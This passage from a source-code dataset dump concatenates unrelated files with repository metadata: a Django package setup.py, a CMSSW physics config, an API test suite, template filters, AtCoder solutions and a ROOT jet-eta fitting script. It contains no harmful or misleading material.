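    ["green_turban", "headgear"],
]))  # → 5
```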
f278e0b8a688262bf51f4581909942235236acfe | 116fa33c52c561b86cee2a43c6f3d18ff6496df5 | /setup.py | fba9817d3fbe164062eb48fff629060326c8b584 | [
"Apache-2.0"
] | permissive | famousthom/overseer | fc3c276a9b53c3fa56ab30fbf35341177f1e1a43 | 69e7a229450c4eed8721e5cfce6a98c708b50a95 | refs/heads/master | 2020-12-24T17:53:43.633263 | 2011-06-04T17:59:40 | 2011-06-04T17:59:40 | 1,847,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,152 | py | #!/usr/bin/env python
try:
from setuptools import setup, find_packages
from setuptools.command.test import test
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
from setuptools.command.test import test
class mytest(test):
def run(self, *args, **kwargs):
from runtests import runtests
runtests()
setup(
name='Overseer',
version='0.2.2',
author='DISQUS',
author_email='opensource@disqus.com',
url='http://github.com/disqus/overseer',
description = 'A status board built with Django',
packages=find_packages(),
zip_safe=False,
install_requires=[
'Django>=1.2.4',
'South',
'django-devserver',
'oauth2>=1.5.169',
'uuid',
],
test_suite = 'overseer.tests',
include_package_data=True,
cmdclass={"test": mytest},
classifiers=[
'Framework :: Django',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Operating System :: OS Independent',
'Topic :: Software Development'
],
) | [
"dcramer@gmail.com"
] | dcramer@gmail.com |
4e035dbd22d936b9cb74cb2496fab16767ca84fd | 35c73e0b545f6ceb791994db6e6c8ce3624885b9 | /config/deprecated_211014/cmssw_privateMC_TagAndProbe_Bp_MuNuDstst.py | 2ee8082fbc51311a1df9a56ce480e891b62ca128 | [] | no_license | ocerri/BPH_RDntuplizer | edb26d466352b831e53d6f18d6d1980074686c9b | a4b157f5a64473bf3db360019d55fa2217199015 | refs/heads/master | 2022-06-27T06:33:32.566956 | 2022-06-09T01:59:46 | 2022-06-09T01:59:46 | 167,600,038 | 2 | 6 | null | 2022-06-03T02:04:49 | 2019-01-25T19:14:04 | C++ | UTF-8 | Python | false | false | 4,742 | py | import os, sys
import FWCore.ParameterSet.Config as cms
import FWCore.ParameterSet.VarParsing as VarParsing
from Configuration.StandardSequences.Eras import eras
process = cms.Process('BPHRDntuplizer', eras.Run2_2018)
# import of standard configurations
process.load('FWCore.MessageService.MessageLogger_cfi')
# Needed for transient track builder
# process.load('Configuration.StandardSequences.Services_cff')
# process.load('Configuration.EventContent.EventContent_cff')
process.load("TrackingTools/TransientTrack/TransientTrackBuilder_cfi")
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_cff')
# process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '102X_upgrade2018_realistic_v12', '')
'''
############ Command line args ################
'''
args = VarParsing.VarParsing('analysis')
args.register('inputFile', '', args.multiplicity.list, args.varType.string, "Input file or template for glob")
args.outputFile = ''
args.parseArguments()
'''
##################### Input ###################
'''
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(args.maxEvents)
)
from glob import glob
if args.inputFile:
if len(args.inputFile) == 1 and '*' in args.inputFile[0]:
flist = glob(args.inputFile[0])
else:
flist = args.inputFile
elif args.inputFiles:
if len(args.inputFiles) == 1 and args.inputFiles[0].endswith('.txt'):
with open(args.inputFiles[0]) as f:
flist = [l[:-1] for l in f.readlines()]
else:
flist = args.inputFiles
else:
fdefault = os.environ['CMSSW_BASE'] + '/src/ntuplizer/BPH_RDntuplizer/production/'
fdefault += 'inputFiles_BP_Tag_Bp_MuNuDstst_Hardbbbar_evtgen_ISGW2_PUc0_10-2-3.txt'
with open(fdefault) as f:
flist = [l[:-1] for l in f.readlines()]
flist = flist[:20]
for i in range(len(flist)):
if os.path.isfile(flist[i]):
flist[i] = 'file:' + flist[i]
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(tuple(flist)),
inputCommands=cms.untracked.vstring('keep *',
'drop GenLumiInfoHeader_generator__SIM'),
skipBadFiles=cms.untracked.bool(True)
)
process.source.duplicateCheckMode = cms.untracked.string('noDuplicateCheck')
'''
##################### Output ###################
'''
if args.outputFile == '.root':
outname = 'TagAndProbe_Bp2MuNuDstst_Pip_CAND.root'
elif args.outputFile.startswith('_numEvent'):
outname = 'TagAndProbe_Bp2MuNuDstst_Pip_CAND' + args.outputFile
else:
outname = args.outputFile
process.TFileService = cms.Service("TFileService",
fileName = cms.string(outname),
closeFileFast = cms.untracked.bool(True)
)
'''
################# Sequence ####################
'''
process.trgF = cms.EDFilter("TriggerMuonsFilter",
muon_charge = cms.int32(1),
verbose = cms.int32(0)
)
process.B2MuDstDT = cms.EDProducer("TagAndProbeBp2DststMuProducer",
trgMuons = cms.InputTag("trgF","trgMuonsMatched", ""),
charge_muon = cms.int32(+1),
charge_K = cms.int32(+1),
charge_pi = cms.int32(-1),
charge_pip = cms.int32(+1),
verbose = cms.int32(0)
)
process.B2MuDstDTFilter = cms.EDFilter("B2DstMuDecayTreeFilter",
verbose = cms.int32(0)
)
cfg_name = os.path.basename(sys.argv[0])
f = open(os.environ['CMSSW_BASE']+'/src/ntuplizer/BPH_RDntuplizer/.git/logs/HEAD')
commit_hash = f.readlines()[-1][:-1].split(' ')[1]
process.outA = cms.EDAnalyzer("FlatTreeWriter",
cmssw = cms.string(os.environ['CMSSW_VERSION']),
cfg_name = cms.string(cfg_name),
commit_hash = cms.string(commit_hash),
verbose = cms.int32(0)
)
process.p = cms.Path(
process.trgF +
process.B2MuDstDT +
process.B2MuDstDTFilter+
process.outA
)
# DEBUG -- dump the event content
# process.output = cms.OutputModule(
# "PoolOutputModule",
# fileName = cms.untracked.string('edm_output.root'),
# )
# process.output_step = cms.EndPath(process.output)
#
# process.schedule = cms.Schedule(
# process.p,
# process.output_step)
'''
############# Overall settings ################
'''
process.MessageLogger.cerr.FwkReport.reportEvery = 100
| [
"olmo.cerri@gmail.com"
] | olmo.cerri@gmail.com |
227c7a0d62baf387c75ed7a38cd0abc217cc728d | 84156ccfb34bd133b4e050e07c165ffe4030c39e | /avocado/export/__init__.py | 7fd0c7ab061c1daa38661335d8e5e48817284ed1 | [
"BSD-3-Clause"
] | permissive | leipzig/avocado | ae4482585683585dd41e9e2ecd2d0e12e649aaa7 | 930bc77371d609e05691508e544e5d97a090cfd8 | refs/heads/master | 2021-01-16T19:59:05.140028 | 2012-12-15T01:49:38 | 2012-12-15T01:49:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | from avocado.core import loader
from avocado.conf import OPTIONAL_DEPS
from _csv import CSVExporter
from _sas import SasExporter
from _r import RExporter
from _json import JSONExporter
from _html import HTMLExporter
registry = loader.Registry(register_instance=False)
registry.register(CSVExporter, 'csv')
registry.register(SasExporter, 'sas')
registry.register(RExporter, 'r')
registry.register(JSONExporter, 'json')
registry.register(HTMLExporter, 'html')
if OPTIONAL_DEPS['openpyxl']:
from _excel import ExcelExporter
registry.register(ExcelExporter, 'excel')
loader.autodiscover('exporters')
| [
"b@devel.io"
] | b@devel.io |
d1fd9a40ca971617b4b8d46e1f4c0b85a476400f | a977365234cad283d9f3edc022976a70501c1c41 | /API-Auto/testCase/PersonalCenter/test5_03case.py | 3052a24d526bd1176eceaa495014da24de0a2e2f | [] | no_license | quqiao/hezongyy | 849f2b9c8a4db562bde5e415ef012ff29c704fd8 | cde6805ada979afe0b24911f8c5d0977cfd92e5a | refs/heads/master | 2021-08-16T10:20:12.618268 | 2020-07-23T09:09:07 | 2020-07-23T09:09:07 | 205,772,625 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,702 | py | import json
import unittest
from common1.configHttp import RunMain
import paramunittest
import geturlParams
import urllib.parse
# import pythoncom
import readExcel
from SaveParam.GetParam import UserLoginToken
from testCase.user import test1_01case
# pythoncom.CoInitialize()
import time
time.sleep(3)
# url = geturlParams.geturlParams().get_Url2_1() # 调用我们的geturlParams获取我们拼接的URL
login_xls = readExcel.readExcel().get_xls('个人中心.xlsx', '3我的收藏商品')
@paramunittest.parametrized(*login_xls)
class testSettleAddGoodsCart(unittest.TestCase):
def setParameters(self, case_name, url, port, path, query, method, expected, result):
"""
set params
:param case_name:
:param path
:param query
:param method
:return:
"""
self.case_name = str(case_name)
self.url = str(url)
self.port = str(int(port))
self.path = str(path)
self.query = str(query)
self.method = str(method)
self.expected = str(expected)
self.result = str(result)
def description(self):
"""
test report description
:return:
"""
self.case_name
def setUp(self):
"""
:return:
"""
print("Running case: " + self.case_name)
def test2_04case(self):
"""Test the '3我的收藏商品' (my favorited goods) list endpoint."""
self.checkResult()
def tearDown(self):
print("Test finished, log output complete\n\n")
def checkResult(self): # 断言
"""
check test result
:return:
"""
# url1 = "http://www.xxx.com/login?"
# new_url = url1 + self.query
# data1 = dict(urllib.parse.parse_qsl(urllib.parse.urlsplit(new_url).query)) # turn the "name=...&pwd=..." pairs of a full URL into {'name': 'xxx', 'pwd': 'bbb'}
data1 = self.query.encode('utf-8')
# hearder = {"hesytoken": "32fcb1ca-a6d7-11ea-858f-0a0027000008"}
hearder = {"hesytoken": UserLoginToken()}
url = 'http://' + self.url + ':' + self.port + self.path
info = RunMain().run_main(self.method, url, data1, hearder) # issue the request via run_main with the method from the Excel row and capture the response
ss = json.loads(info) # parse the response into a dict
if self.case_name == 'userId正确': # a valid case should return the success code '000000'
self.assertEqual(ss['code'], '000000')
if self.case_name == 'userId错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'userId为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'barndId正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'barndId错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'barndId为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'id正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'id错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'id为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'vip正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'vip错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'vip为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'limitSize正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'limitSize错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'limitSize为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'limitStart正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'limitStart错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'limitStart为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'goodsIdList正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'goodsIdList错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'goodsIdList为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'manufacturerName正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'manufacturerName错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'manufacturerName为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'keywords正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'keywords错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'keywords为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'specification正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'specification错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'specification为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'dosageForm正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'dosageForm错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'dosageForm为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'serialNumberList正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'serialNumberList错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'serialNumberList为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'orderColumn正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'orderColumn错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'orderColumn为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'orderRule正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'orderRule错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'orderRule为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'statisticStart正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'statisticStart错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'statisticStart为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'statisticEnd正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'statisticEnd错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'statisticEnd为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'preferentialAmount正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'preferentialAmount错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'preferentialAmount为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'gift正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'gift错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'gift为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'specialSale正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'specialSale错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'specialSale为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'checkExpirationDate正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'checkExpirationDate错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'checkExpirationDate为空': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'preferential正确': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'preferential错误': # same as above
self.assertEqual(ss['code'], '000000')
if self.case_name == 'preferential为空': # same as above
self.assertEqual(ss['code'], '000000')
print("Response message: " + ss['message'])
# if __name__ == '__main__': # quick check that the config-reading helpers work
# testUserLogin().checkResult()
| [
"553248560@.com"
] | 553248560@.com |
28bae8f3274478cae27342b125169091f3c11d2f | 935c60a8fa9a2f8d0efed9b1123a0a75e4c28250 | /censusreporter/apps/census/templatetags/sumlevs.py | 5eabc22d9189c83245fc75d7a4370fdf562a8e1b | [
"MIT"
] | permissive | censusreporter/censusreporter | a5299aebbec51d0508bdea6a90415ad2d724a2a5 | e8418d657b546482a80e92c6cd17332ab22c40c0 | refs/heads/master | 2023-08-31T23:10:43.506418 | 2023-08-25T16:05:46 | 2023-08-25T16:05:46 | 10,183,514 | 694 | 123 | MIT | 2023-02-15T19:03:00 | 2013-05-20T22:46:00 | HTML | UTF-8 | Python | false | false | 495 | py | from django import template
from census.utils import SUMMARY_LEVEL_DICT
register = template.Library()
@register.filter
def sumlev_name(sumlev):
if SUMMARY_LEVEL_DICT[sumlev]:
return SUMMARY_LEVEL_DICT[sumlev]['name']
return ''
@register.filter
def sumlev_name_plural(sumlev):
if SUMMARY_LEVEL_DICT[sumlev]:
return SUMMARY_LEVEL_DICT[sumlev]['plural']
return ''
@register.filter
def list_cut(itemlist, term):
return [ i for i in itemlist if not i == term ]
| [
"ryan.a.pitts@gmail.com"
] | ryan.a.pitts@gmail.com |
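The filters above index `SUMMARY_LEVEL_DICT[sumlev]` directly, which raises `KeyError` for an unknown summary level rather than falling through to the empty-string return. A defensive variant (a sketch with a hypothetical levels map, not the project's actual dictionary) uses `.get()`:

```python
def sumlev_name(sumlev, levels):
    # .get() returns None for unknown keys instead of raising KeyError,
    # so the lookup degrades to an empty string.
    entry = levels.get(sumlev)
    return entry["name"] if entry else ""

levels = {"040": {"name": "state", "plural": "states"}}
print(sumlev_name("040", levels))  # → state
print(sumlev_name("999", levels))  # → empty string
```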
cfe688f0835102af0855fbac30fec0aad5293bcf | 0eaf0d3f0e96a839f2ef37b92d4db5eddf4b5e02 | /abc237/b.py | 77a5fc4125ebfbad2fd73a68cdf2011e23c51827 | [] | no_license | silphire/atcoder | b7b02798a87048757745d99e8564397d1ca20169 | f214ef92f13bc5d6b290746d5a94e2faad20d8b0 | refs/heads/master | 2023-09-03T17:56:30.885166 | 2023-09-02T14:16:24 | 2023-09-02T14:16:24 | 245,110,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 189 | py | h, w = map(int, input().split())
aa = [
list(map(int, input().split()))
for _ in range(h)
]
for x in range(w):
b = [aa[i][x] for i in range(h)]
print(' '.join(map(str, b))) | [
"silphire@gmail.com"
] | silphire@gmail.com |
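The column-printing loop in `b.py` above is a matrix transpose; a compact equivalent (a sketch with hypothetical sample data) uses `zip(*rows)`:

```python
def transpose(rows):
    # zip(*rows) pairs up the i-th element of every row, i.e. the columns.
    return [list(col) for col in zip(*rows)]

a = [[1, 2, 3],
     [4, 5, 6]]
for row in transpose(a):
    print(' '.join(map(str, row)))
# 1 4
# 2 5
# 3 6
```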
240707e34591a5f96f21763228a52c2a2efccf8d | bdfd3889e1cc02f97b3e2dc0032ce0c9b59bf37e | /src/gork/contrib/gbase/context_processors.py | 63035d955323f3fdfe2e9991d70633f56e88470d | [
"MIT"
] | permissive | indexofire/gork | c85728953cfa9ab98c59b79a440d4e12212cbc4e | c5e172b896a51c15f358d3aabbcb66af837b54b2 | refs/heads/master | 2016-09-06T04:58:01.435002 | 2014-02-06T08:35:51 | 2014-02-06T08:35:51 | 9,260,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py | # -*- coding: utf-8 -*-
from django.conf import settings
def site_info(request):
return {
'SITE_NAME': getattr(settings, 'SITE_NAME', None),
'CODE_AUTHOR': getattr(settings, 'CODE_AUTHOR', None),
'TEMPLATE_AUTHOR': getattr(settings, 'TEMPLATE_AUTHOR', None),
'SITE_URL': getattr(settings, 'SITE_URL', None),
'SITE_DESCRIPTION': getattr(settings, 'SITE_DESCRIPTION', None),
}
| [
"indexofire@gmail.com"
] | indexofire@gmail.com |
93d50406711a9575123d20b27934aaf6d01e5e66 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02982/s044044811.py | 26dc9cd58c1c9f23cda90d6764b4c3a68593bf42 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 281 | py | import numpy as np
N,D = map(int,input().split())
x = np.array([[int(i) for i in input().split()] for _ in range(N)])
count = 0
for i in range(N):
for j in range(i+1,N):
if float.is_integer(np.linalg.norm(x[i][:]-x[j][:], ord=2)):
count += 1
print(count)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
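The snippet above tests whether `np.linalg.norm` returns a whole number, which is vulnerable to floating-point round-off. A sketch of an exact alternative (assuming integer coordinates, as in the original problem) keeps the squared distance in integer arithmetic and checks for a perfect square:

```python
import math

def integer_distance_pairs(points):
    # Compare the integer squared distance against its integer square
    # root (math.isqrt, Python 3.8+), avoiding floats entirely.
    count = 0
    for i in range(len(points)):
        for j in range(i + 1, len(points)):
            sq = sum((a - b) ** 2 for a, b in zip(points[i], points[j]))
            r = math.isqrt(sq)
            if r * r == sq:
                count += 1
    return count

print(integer_distance_pairs([(0, 0), (3, 4), (1, 1)]))  # → 1
```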
d970b1196ea3e6aef62e8c6538c5f9e14955d85d | fb4afc975c4df4ea59366e6602a1359dc484aaa4 | /silvio/check_eta2_distribution_fit.py | fb40f599a34d5e475593ab6954b6d7d0154c1fed | [] | no_license | silviodonato/DijetRootTreeAnalyzer | b63181dc526f76cc67319f5c5292136fac522071 | a47fe92d1a6d6e35b030606fe6ee837bb0a4c2ca | refs/heads/master | 2021-06-24T10:45:34.198060 | 2019-06-04T15:19:38 | 2019-06-04T15:19:38 | 114,103,862 | 0 | 0 | null | 2018-12-04T15:19:11 | 2017-12-13T09:56:24 | C | UTF-8 | Python | false | false | 7,096 | py | import ROOT
import array
redoPlot = True
'''
ROOT.gROOT.SetBatch(0)
canv2 = ROOT.TCanvas()
'''
colors = [
ROOT.kBlack,
ROOT.kYellow+1,
ROOT.kRed,
ROOT.kMagenta,
ROOT.kBlue,
ROOT.kCyan+1,
ROOT.kGreen+1,
ROOT.kOrange,
ROOT.kPink,
ROOT.kViolet,
ROOT.kAzure,
ROOT.kTeal,
ROOT.kSpring,
ROOT.kGray,
]
colors = colors * 20
#bins = range(200,800,50)
#bins = range(-3,3)
#bins = [i*1./10. for i in range(-25,26)]
bins = [i*1./10. for i in range(-25,26,2)]
#bins = [60,70,80,90]
ROOT.gStyle.SetOptStat(0)
#fileName = "../0683324A-6D0D-8443-A441-7FDF9D0CF9EC.root"
fileName = "../data_ntuple_CR_nocut.root"
#fileName = "../data_trig_eff_eta2.5.root"
#fileName = "../data_trig_eff_eta2.5_skim_40.root"
denTrigger = "abs(jet2_eta)<2.5 && abs(jet1_eta)<2.5 && isr_pt>50"
#denTrigger = "isr_pt>40"
#denTrigger = "isr_pt>=70 && HLT_CaloScoutingHT250"
preselect = denTrigger + "&& 1" #
title = "Jet2 eta"
varX = "jet2_eta"
varX_nbins, varX_min, varX_max = 30,-2.5,2.5
varX_title = "m_{jj}"
fit_min = 320
#######################################################
N = 4
dijet_eta_max = 3
#canv.SetTitle(title)
preselect += "&& (%s < %d)"%(varX,varX_max)
file_ = ROOT.TFile(fileName)
tree = file_.Get("tree")
if not type(tree)==ROOT.TTree:
tree = file_.Get("rootTupleTree/tree")
#tree.Draw("dijet_eta >> deta(100,0,%f)"%dijet_eta_max,"%s && dijet_mass>300"%(preselect) ,"")
#deta = ROOT.gDirectory.Get("deta")
#deta.Draw("HIST")
#x = array.array('d',[i*1./N for i in range(N)])
#y = array.array('d',[0 for i in range(N)])
#deta.GetQuantiles(N,y,x)
#bins = list(y)
#funct = ROOT.TF1("funct","pol4",0,3)
#deta.Fit(funct)
#funct.Draw("same")
#canv.SaveAs("histoMjj.root")
c2 = ROOT.TCanvas("c2","")
#c2.SetLogz()
import copy
g = ROOT.TGraph2D()
chi2 = {}
histos=[]
fits = []
for i in range(len(bins)-1):
preselect = denTrigger + "&& (jet1_eta)>%f && (jet1_eta)<%f"%(bins[i],bins[i+1]) #
tree.Draw("%s >> histo(%d,%f,%f)"%(varX,varX_nbins,varX_min,varX_max),"%s"%(preselect) ,"") # nbins is an integer bin count
histo = ROOT.gDirectory.Get("histo")
histos.append(histo.Clone("%s < jet1 eta < %s"%((round(bins[i],2)),round(bins[i+1],2))))
leg = ROOT.TLegend(0.52,0.7,0.9,0.9)
#leg.SetHeader("")
for i,histo in enumerate(histos):
histo.SetTitle("")
histo.GetXaxis().SetTitle("jet2 #eta") # the plotted variable is jet2_eta
histo.GetYaxis().SetTitle("AU")
histo.Sumw2()
histo.Scale(1./histo.Integral(-1,varX_nbins))
leg.AddEntry(histo,histo.GetName(),"l")
histo.SetLineColor(colors[i])
histo.SetLineWidth(2)
histo.SetMinimum(0)
histo.SetMaximum(2.*histo.GetMaximum())
# fit = ROOT.TF1("fit"+str(i),"gaus(0)+gaus(3)", varX_min, varX_max)
# fit.SetParameters(0.082, 2.7, -1, 0.03, 0.5, -2.0)
fit = ROOT.TF1("fit"+str(i),"gaus(0)", varX_min, varX_max)
fit.SetParameters(0.05, 0.01, 1.7)
fit.SetLineColor(colors[i])
fitr = histo.Fit(fit,"","",varX_min, varX_max)
fits.append(copy.deepcopy(fit))
print(fits[i].GetParameter(1))
# histos[-1].Fit(fit,"","",varX_min, varX_max)
for i,histo in enumerate(histos):
if i==0:
histo.Draw("ERR")
# histo.Draw("HIST,same")
else:
histo.Draw("ERR,same")
# histo.Draw("HIST,same")
print(fits[i].GetParameter(1))
fits[i].Draw("same")
#c2.SetLogy()
leg.Draw()
c2.SaveAs("eta2plotcheck.png")
c2.SaveAs("eta2plotcheck.pdf")
#g.Draw("LEGO")c2.SaveAs("plotDetacheck.png")
means = ROOT.TGraphErrors()
sigmas = ROOT.TGraphErrors()
for graph in [means,sigmas]:
npar = 2
if graph==means:
npar = 1
for i,fit in enumerate(fits):
val = (bins[i]+bins[i+1])/2
err = (float(bins[i+1])-bins[i])/2
graph.SetPoint(i,val,fit.GetParameter(npar))
graph.SetPointError(i,err,fit.GetParError(npar))
c3 = ROOT.TCanvas("c3")
means.Draw("APL")
means_fit = ROOT.TF1("means_fit","pol1")
means.Fit(means_fit)
c3.SaveAs("means.png")
c4 = ROOT.TCanvas("c4")
sigmas.Draw("APL")
sigmas_fit = ROOT.TF1("sigmas_fit","pol2")
sigmas_fit.SetParameters(2,0,-0.001)
sigmas.Fit(sigmas_fit)
c4.SaveAs("sigmas.png")
'''
import ROOT
import array
redoPlot = True
'''
ROOT.gROOT.SetBatch(0)
canv2 = ROOT.TCanvas()
'''
colors = [
ROOT.kBlack,
ROOT.kYellow+1,
ROOT.kRed,
ROOT.kMagenta,
ROOT.kBlue,
ROOT.kCyan+1,
ROOT.kGreen+1,
ROOT.kOrange,
ROOT.kPink,
ROOT.kViolet,
ROOT.kAzure,
ROOT.kTeal,
ROOT.kSpring,
ROOT.kGray,
]
#bins = range(200,800,50)
bins = range(-3,3)
#bins = [i/10. for i in range(-30,30)]
#bins = [60,70,80,90]
ROOT.gStyle.SetOptStat(0)
fileName = "../data_trig_eff_eta2.5.root"
#fileName = "../data_trig_eff_eta2.5_skim_40.root"
denTrigger = "1"
#denTrigger = "isr_pt>40"
#denTrigger = "isr_pt>=70 && HLT_CaloScoutingHT250"
preselect = denTrigger + "&& 1" #
title = "Jet2 eta"
varX = "jet2_eta"
varX_nbins, varX_min, varX_max = 30,-3,3
varX_title = "m_{jj}"
fit_min = 320
#######################################################
N = 4
dijet_eta_max = 3
#canv.SetTitle(title)
preselect += "&& (%s < %d)"%(varX,varX_max)
file_ = ROOT.TFile(fileName)
tree = file_.Get("tree")
if not type(tree)==ROOT.TTree:
tree = file_.Get("rootTupleTree/tree")
#tree.Draw("dijet_eta >> deta(100,0,%f)"%dijet_eta_max,"%s && dijet_mass>300"%(preselect) ,"")
#deta = ROOT.gDirectory.Get("deta")
#deta.Draw("HIST")
#x = array.array('d',[i*1./N for i in range(N)])
#y = array.array('d',[0 for i in range(N)])
#deta.GetQuantiles(N,y,x)
#bins = list(y)
#funct = ROOT.TF1("funct","pol4",0,3)
#deta.Fit(funct)
#funct.Draw("same")
#canv.SaveAs("histoMjj.root")
c2 = ROOT.TCanvas("c2","")
#c2.SetLogz()
import copy
g = ROOT.TGraph2D()
chi2 = {}
histos=[]
fits = []
for i in range(len(bins)-1):
preselect = denTrigger + "&& (jet1_eta)>%f && (jet1_eta)<%f"%(bins[i],bins[i+1]) #
tree.Draw("%s >> histo(%f,%f,%f)"%(varX,varX_nbins,varX_min,varX_max),"%s"%(preselect) ,"")
histo = ROOT.gDirectory.Get("histo")
histos.append(histo.Clone("%s < DijetMass < %s"%((round(bins[i],2)),round(bins[i+1],2))))
leg = ROOT.TLegend(0.52,0.7,0.9,0.9)
#leg.SetHeader("")
for i,histo in enumerate(histos):
histo.SetTitle("")
histo.GetXaxis().SetTitle("m(jj)")
histo.GetYaxis().SetTitle("AU")
histo.Sumw2()
histo.Scale(1./histo.Integral(-1,varX_nbins))
leg.AddEntry(histo,histo.GetName(),"l")
histo.SetLineColor(colors[i])
histo.SetLineWidth(2)
histo.SetMinimum(3E-2)
histo.SetMaximum(2.*histo.GetMaximum())
fit = ROOT.TF1("fit"+str(i),"gaus(0)+gaus(3)", varX_min, varX_max)
fit.SetParameters(0.082, 2.7, -1, 0.03, 0.5, -2.0)
fit.SetLineColor(colors[i])
histo.Fit(fit,"","",varX_min, varX_max)
fits.append(copy.deepcopy(fit))
print(fits[i].GetParameter(1))
# histos[-1].Fit(fit,"","",varX_min, varX_max)
for i,histo in enumerate(histos):
if i==0:
histo.Draw("ERR")
# histo.Draw("HIST,same")
else:
histo.Draw("ERR,same")
# histo.Draw("HIST,same")
print(fits[i].GetParameter(1))
fits[i].Draw("same")
#c2.SetLogy()
leg.Draw()
c2.SaveAs("eta2plotcheck.png")
c2.SaveAs("eta2plotcheck.pdf")
#g.Draw("LEGO")c2.SaveAs("plotDetacheck.png")
''' | [
"silvio.donato@cern.ch"
] | silvio.donato@cern.ch |
09d2b162d3aa555c6e0bdf0745efa0aa7326c043 | a8b37bd399dd0bad27d3abd386ace85a6b70ef28 | /airbyte-integrations/connectors/source-github/unit_tests/unit_test.py | e7e3adf6bf81d5be520adfda3c14e9fdddcb3859 | [
"MIT",
"LicenseRef-scancode-free-unknown",
"Elastic-2.0"
] | permissive | thomas-vl/airbyte | 5da2ba9d189ba0b202feb952cadfb550c5050871 | 258a8eb683634a9f9b7821c9a92d1b70c5389a10 | refs/heads/master | 2023-09-01T17:49:23.761569 | 2023-08-25T13:13:11 | 2023-08-25T13:13:11 | 327,604,451 | 1 | 0 | MIT | 2021-01-07T12:24:20 | 2021-01-07T12:24:19 | null | UTF-8 | Python | false | false | 912 | py | #
